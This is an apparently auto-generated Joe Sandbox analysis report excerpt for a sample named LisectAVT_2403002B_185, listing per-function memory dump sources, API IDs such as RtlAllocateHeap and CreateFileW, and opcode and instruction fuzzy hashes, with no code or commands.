                                                              • Opcode Fuzzy Hash: 0e974cc9f43296fd16084f26bfb80b12497d577ee30dbb94e77df252dbc1c587
                                                              • Instruction Fuzzy Hash: 2C3143B4A0025ADFDB08CF98CD95BAEBBB1FF88704F148558E5566B385C771AD00CB91
                                                              APIs
                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 005E375A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                              • String ID:
                                                              • API String ID: 3936482309-0
                                                              • Opcode ID: 93970942868f3920fc955ee670ac7538057266f07797ec8a0468cb0e3093f797
                                                              • Instruction ID: 76f23b17772328796895f5617f020c264a313373f38a54ecd15f2fcb133713b0
                                                              • Opcode Fuzzy Hash: 93970942868f3920fc955ee670ac7538057266f07797ec8a0468cb0e3093f797
                                                              • Instruction Fuzzy Hash: 533141B4A0025ADFDB08DF98C995BAEBBB2FF84704F148658E4556B381C771AD00CB91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: allocator
                                                              • String ID:
                                                              • API String ID: 3447690668-0
                                                              • Opcode ID: e43460ef727c0a392b97d5f3b85cb484f29c45baabe6a73a995a193699bd0af5
                                                              • Instruction ID: b9529a5601284ccb6effc4755e8ce725277d3648ee96f223723e76abfc472f55
                                                              • Opcode Fuzzy Hash: e43460ef727c0a392b97d5f3b85cb484f29c45baabe6a73a995a193699bd0af5
                                                              • Instruction Fuzzy Hash: 2321A7B4A0064A8FCB08DF99C991BAFBBB5FF89300F104669E415AB394D7346801CFA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: 4fc36f1438358cfdd458659f52a6dd646c9b5fa63342d3cc454e0d1ef4ffadbf
                                                              • Instruction ID: 9429f7c0d8b8037f0a13d1cdef0809c4a0248e249d8fd4e606b0f487307cfeea
                                                              • Opcode Fuzzy Hash: 4fc36f1438358cfdd458659f52a6dd646c9b5fa63342d3cc454e0d1ef4ffadbf
                                                              • Instruction Fuzzy Hash: 59111571A0420AAFDB05DF58E94599B7BF9EF48304F044069F909AB251D770EE11CBA4
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,005E112E,005EEC9B,?,005F6674,00000001,00000364,00000006,000000FF,005EEC9B,005EEC9B,?,005EDF6C,005F13BE,FF85FFFF), ref: 005F86C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 27b9a49e5db20c3e8aaf175d980478b2a898a867c7c033d7fd75ce85d6b441b8
                                                              • Instruction ID: bd3278f881252d163013cad1e7981114d73b29df82f17eb8be9200a06d09ee21
                                                              • Opcode Fuzzy Hash: 27b9a49e5db20c3e8aaf175d980478b2a898a867c7c033d7fd75ce85d6b441b8
                                                              • Instruction Fuzzy Hash: FCF0B43260063DA7DF215A72AC09A7B7F59BF917A0B288022FB04D6184EE38DC0186E4
                                                              APIs
                                                              • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 005EA3F3
                                                                • Part of subcall function 005EB1A3: RaiseException.KERNEL32(E06D7363,00000001,00000003,005E141C,?,?,?,005E141C,?,00616F3C), ref: 005EB203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
                                                              • String ID:
                                                              • API String ID: 3447279179-0
                                                              • Opcode ID: 4dc6b5d106579586ee56212a503f47a8d40adda815a7871987497bb195fc48c7
                                                              • Instruction ID: e199b34f9cc122dddcbaffc9527c5984c3cf27331360dec45155c499d3509562
                                                              • Opcode Fuzzy Hash: 4dc6b5d106579586ee56212a503f47a8d40adda815a7871987497bb195fc48c7
                                                              • Instruction Fuzzy Hash: DAF0243880038EB68B1CB6B6FC1EADD3F2D3E40320F504620B994910D1EF70A655C1D2
                                                              APIs
                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 005E8B47
                                                                • Part of subcall function 005E1400: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 005E1409
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
                                                              • String ID:
                                                              • API String ID: 2103942186-0
                                                              • Opcode ID: 7c0a3bddb8505c8a4b1dd132b19cb8cbf4b43b9558918ad84463fe1d355bfc67
                                                              • Instruction ID: ab5b834de8693d095f86bfb86cf727a2e56d2430d7041f33542c42fee9c37cb4
                                                              • Opcode Fuzzy Hash: 7c0a3bddb8505c8a4b1dd132b19cb8cbf4b43b9558918ad84463fe1d355bfc67
                                                              • Instruction Fuzzy Hash: 2CF03CB4D00548EBCF08EFA9D4856ADFBB5BF84344F1081A9E8599B385E630AE50DB85
                                                              APIs
                                                              • allocator.LIBCONCRTD ref: 005E8925
                                                                • Part of subcall function 005E7540: _Allocate.LIBCONCRTD ref: 005E7554
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Allocateallocator
                                                              • String ID:
                                                              • API String ID: 40054573-0
                                                              • Opcode ID: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                              • Instruction ID: 47c65b235b971abb68485e9f13a86fa430b15a979bfc27a013e6ddad4daad06d
                                                              • Opcode Fuzzy Hash: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                              • Instruction Fuzzy Hash: 220146B4E05209EFCF04DF99D5919AEBBF1FF89304F2081A9D949A7341D730AA51CB94
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,005FF487,00000000,?,005FF487,00000220,?,?,00000000), ref: 005F9077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a3f6b2c55a8e050414fcf7f23432a091f3e84fb013df5b70d1a4d60bda43571d
                                                              • Instruction ID: 7cf383e95872d9a602f542fbc35fc7d09e01d1b6d593e003915228688bbd0865
                                                              • Opcode Fuzzy Hash: a3f6b2c55a8e050414fcf7f23432a091f3e84fb013df5b70d1a4d60bda43571d
                                                              • Instruction Fuzzy Hash: 6EE03021605A2EA6EB312676AC0CBBF6E5DBFC27A0F194121EB4496190DF68DC0181A5
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000000,?,006057F2,?,?,00000000,?,006057F2,?,0000000C), ref: 0060541F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 56b1c12b65d7ef96c005c94ff03e0dae73d9c17246bab99fb35df3000138ad03
                                                              • Instruction ID: 5ff65d2ec74d3371661dc1d3d3e9379be4fc7fe4148e7a401d5a0161c1ec0543
                                                              • Opcode Fuzzy Hash: 56b1c12b65d7ef96c005c94ff03e0dae73d9c17246bab99fb35df3000138ad03
                                                              • Instruction Fuzzy Hash: FFD06C3204010DBBDF029F84DD06EDA3BAAFB48754F018000BA1856020C732E821AB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq
                                                              • API String ID: 0-600464949
                                                              • Opcode ID: 52c6bd4fbcee468c08a87dbfbe496d82324da1c7006ad417da6b3a7ba1904867
                                                              • Instruction ID: 2b3ab5ec26106c76174206fac038775337b85634f014cba707d700df67dcedf7
                                                              • Opcode Fuzzy Hash: 52c6bd4fbcee468c08a87dbfbe496d82324da1c7006ad417da6b3a7ba1904867
                                                              • Instruction Fuzzy Hash: 07414D34B042458FDB08DF69C558AAE7BF2FF8D210F1584A8E806AB395CB35DD02CB65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&]q
                                                              • API String ID: 0-1343553580
                                                              • Opcode ID: 20c0689dea12da306a79176d25e7e8609d81e334ef59fa903317bebb66ebd419
                                                              • Instruction ID: d0f97547018fe1101f8f4f1105b47c3e93b72481824182a5f8a46cc0ba114360
                                                              • Opcode Fuzzy Hash: 20c0689dea12da306a79176d25e7e8609d81e334ef59fa903317bebb66ebd419
                                                              • Instruction Fuzzy Hash: 8721A176A042188FCB14DFAEE4046DEFFF9EB89320F14846AD509E7300CB35A9058BE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tMl
                                                              • API String ID: 0-1290904954
                                                              • Opcode ID: 2844864a8444581c220c910c33a57b4391c92bfbf2768e2ecb3686f812fd8032
                                                              • Instruction ID: f1d8e36684f878ebc23b964ddd136adaa3492ca0704993fd666deaff1942e5bd
                                                              • Opcode Fuzzy Hash: 2844864a8444581c220c910c33a57b4391c92bfbf2768e2ecb3686f812fd8032
                                                              • Instruction Fuzzy Hash: 15218D746043958FCF15DBB5D8545BEBFF6BF4620570908ADD442C72A1CB34DA01CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hQl
                                                              • API String ID: 0-1124210505
                                                              • Opcode ID: 8fe03901cc0d693f2e1c5e4930c789429ffc094cf8a0788ccc935e3145c2fcb2
                                                              • Instruction ID: 015ad8ff406447dce084335228c912ed89ed6696ea326d166df59335486d4434
                                                              • Opcode Fuzzy Hash: 8fe03901cc0d693f2e1c5e4930c789429ffc094cf8a0788ccc935e3145c2fcb2
                                                              • Instruction Fuzzy Hash: A3110E7A700308AFC704DB68E88096E7BFAFFC921071005B9E804CB350DB35AD05C7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hQl
                                                              • API String ID: 0-1124210505
                                                              • Opcode ID: 67ce6134c2bb4d40f290b0fe462b9b990dbd942eedca3faef7b95ef9c7c04116
                                                              • Instruction ID: fa3d12ea3748f505549d9207556409a30030a49c2f05853c3c53e608068b20f7
                                                              • Opcode Fuzzy Hash: 67ce6134c2bb4d40f290b0fe462b9b990dbd942eedca3faef7b95ef9c7c04116
                                                              • Instruction Fuzzy Hash: 7D016D79700208AFC704EB68E880D6EBBFAFFC965471045B9E409DB350DB35AD058BA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b17a595ce6dca10f7008a89da6d4ab5af9873c48a7d8bebac481543a1d0ebf3a
                                                              • Instruction ID: 5d58e4b7bf541324990ba1ae4be77103ccae29bd4545c7d3c9d6378b5e762d3d
                                                              • Opcode Fuzzy Hash: b17a595ce6dca10f7008a89da6d4ab5af9873c48a7d8bebac481543a1d0ebf3a
                                                              • Instruction Fuzzy Hash: 79A1D470A042459FCB0ACF5CC5949AEFBB1FF49314B25859AC845DB3A2C735EC91CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2acd0c0011726abdcfc754efff1fe8253edf3f93cabb6f8c83ce21d374ec067
                                                              • Instruction ID: 53f76ce1ec2271da1c4bccba7eb0f0a996c44ad17bdc18af149482445e08075e
                                                              • Opcode Fuzzy Hash: b2acd0c0011726abdcfc754efff1fe8253edf3f93cabb6f8c83ce21d374ec067
                                                              • Instruction Fuzzy Hash: C551F7753082059FCB18CB79D898E2A7BE6FFC9354B144969E419CB355DB31DC02C751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71a8f266db218e9e076070633d2fe4daf21e9e8546d9796ae98077df8a15bbda
                                                              • Instruction ID: 5b5caa4ce3d7e3b8a191ed0a7db610542adbfa175016b400a52d6202a9799ec6
                                                              • Opcode Fuzzy Hash: 71a8f266db218e9e076070633d2fe4daf21e9e8546d9796ae98077df8a15bbda
                                                              • Instruction Fuzzy Hash: 53611AB1D002089FDB15CFA9D58869DFBF6FF88310F148569E809EB354D774A945CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 534b0def038c63a067bd2d43202b550c063f3190c0547bead3153a298982d0c3
                                                              • Instruction ID: 00b4e22cf8ac051c76e33ecb42a07f008d47b70075660f01789cec05681ef82b
                                                              • Opcode Fuzzy Hash: 534b0def038c63a067bd2d43202b550c063f3190c0547bead3153a298982d0c3
                                                              • Instruction Fuzzy Hash: F0512CB1E002089FDB15CFA9D584A9DFBF6FF88310F148069E809EB354DB749945CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd58900c04798c7c735966e2407c35922665a289eb6d158815755da78e5c3f17
                                                              • Instruction ID: d9a0731a6368028b71abc850a99b043419a92f149d99691dccdb1258a3d182dc
                                                              • Opcode Fuzzy Hash: fd58900c04798c7c735966e2407c35922665a289eb6d158815755da78e5c3f17
                                                              • Instruction Fuzzy Hash: 03416034A042458FDB09DF64C9A8AE97FF2BF8A300F1984E9D442AB361DB35DD42CB55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f779969b9d4de1a70c802bde99b7eb023b8d076cbd14e04614fd327e3cb3a81
                                                              • Instruction ID: 7139d679b3161602b501e8c4c7798d0154a02e913de824b570346311c15f976a
                                                              • Opcode Fuzzy Hash: 3f779969b9d4de1a70c802bde99b7eb023b8d076cbd14e04614fd327e3cb3a81
                                                              • Instruction Fuzzy Hash: D8413674A001459FCB09CF98C598DEAFBB1FF48310B218699D945AB3A5C732FD90CBA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa5819f29f01e01312b70f4335f932a445a8039dc551598c0ceace4b52eb417b
                                                              • Instruction ID: 5351636ec637af816ef1e18a2725676523bf71cfc1c323c85ad4f88d82aac1cf
                                                              • Opcode Fuzzy Hash: aa5819f29f01e01312b70f4335f932a445a8039dc551598c0ceace4b52eb417b
                                                              • Instruction Fuzzy Hash: 2E31A075301605AFC709EB79E848B5ABB9AEFC4211F048539D50ACB364DF75ED05CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44db479df1fd64c500bd624382224df147c3b3da5b7cf46cc118436232284c56
                                                              • Instruction ID: 4f73517aa56b7a76e8e9f8ecfc7185535161df5a7ee4873f9420908c81b94c46
                                                              • Opcode Fuzzy Hash: 44db479df1fd64c500bd624382224df147c3b3da5b7cf46cc118436232284c56
                                                              • Instruction Fuzzy Hash: C03143B4B012099FDF08DBB9D4596AEBBFAEF88310F148479E405EB354EA7498018B51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff35d2bb477645bd6c2c0e1058967bbd0ef5ee3603bfee9d9796d4b49c4124e4
                                                              • Instruction ID: d735b1d1316cba94f272d75019dbab53cb032ec967cc75f4d5b25479c47ca701
                                                              • Opcode Fuzzy Hash: ff35d2bb477645bd6c2c0e1058967bbd0ef5ee3603bfee9d9796d4b49c4124e4
                                                              • Instruction Fuzzy Hash: C3312FB4B012099FDF08DFB9D498AAE7BFAEF88350F148429E405EB354EB749C018B51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2622785031.00000000037AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 037AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_37ad000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6012176b9e3b2dd3bedb342e0c5662ae0b068ad7a9c4535278d3656be758451
                                                              • Instruction ID: 9283e917dcc7461c1160e672b2f5c1f909db00a85d483e0b41db3d2d7dc60b57
                                                              • Opcode Fuzzy Hash: b6012176b9e3b2dd3bedb342e0c5662ae0b068ad7a9c4535278d3656be758451
                                                              • Instruction Fuzzy Hash: 9021F171504600EFCB05CF68D9C0F26BF66FB88314F24C6ADE9094A656C33AD456EBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2622485361.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3790000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 914c4e754a6a0a91f8d6f43532484368a43521f90b7ad479a09db9fc2fa3b0df
                                                              • Instruction ID: 742d3ee31833efc32168d5c98bf71470d20908a3ca0c910b0519a0e555f1b3fb
                                                              • Opcode Fuzzy Hash: 914c4e754a6a0a91f8d6f43532484368a43521f90b7ad479a09db9fc2fa3b0df
                                                              • Instruction Fuzzy Hash: 5B1126725683874BEF168B34A8AC9A5BF75BF93320B4889CBC0448706ACB24440EDB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d84442fea12980b582f1237cedec699d2b042d974fcc44f8c2224789199d12a
                                                              • Instruction ID: a1d7c3b3ba98dd5eee33c71ada4f23d663a5ef230f15ceac21f8ccc1e9319ca7
                                                              • Opcode Fuzzy Hash: 7d84442fea12980b582f1237cedec699d2b042d974fcc44f8c2224789199d12a
                                                              • Instruction Fuzzy Hash: 652189B191635CEFDB18CF69E14A7D9BBF6FB48324F14812AD818A3354C3B85A54CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0293753660833bb165e25f27deb64447d3676dcb156333ef7174bd4009dbc567
                                                              • Instruction ID: 661b582417786f6dcc3124a8f24ecc71f6c898aecd6017194c87b18bf4a7ad78
                                                              • Opcode Fuzzy Hash: 0293753660833bb165e25f27deb64447d3676dcb156333ef7174bd4009dbc567
                                                              • Instruction Fuzzy Hash: 62112B7A7001188FDB04DBADE9449EE77F6FFC8211B0040A9E909DB324DB35DD168B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d8a244f2a412db2e97f6965e5b399696a192d546b5083663acb14caedbbe294
                                                              • Instruction ID: 6f2c897d46faf6f2d793eb8c33c9bb517b5e06d7ce61ee511035505ad0787a69
                                                              • Opcode Fuzzy Hash: 3d8a244f2a412db2e97f6965e5b399696a192d546b5083663acb14caedbbe294
                                                              • Instruction Fuzzy Hash: ED215CB091635CEFDB14CF69E54A799BFF6FB48324F14802AD808A3304C3B85654CB91
                                                              Memory Dump Source
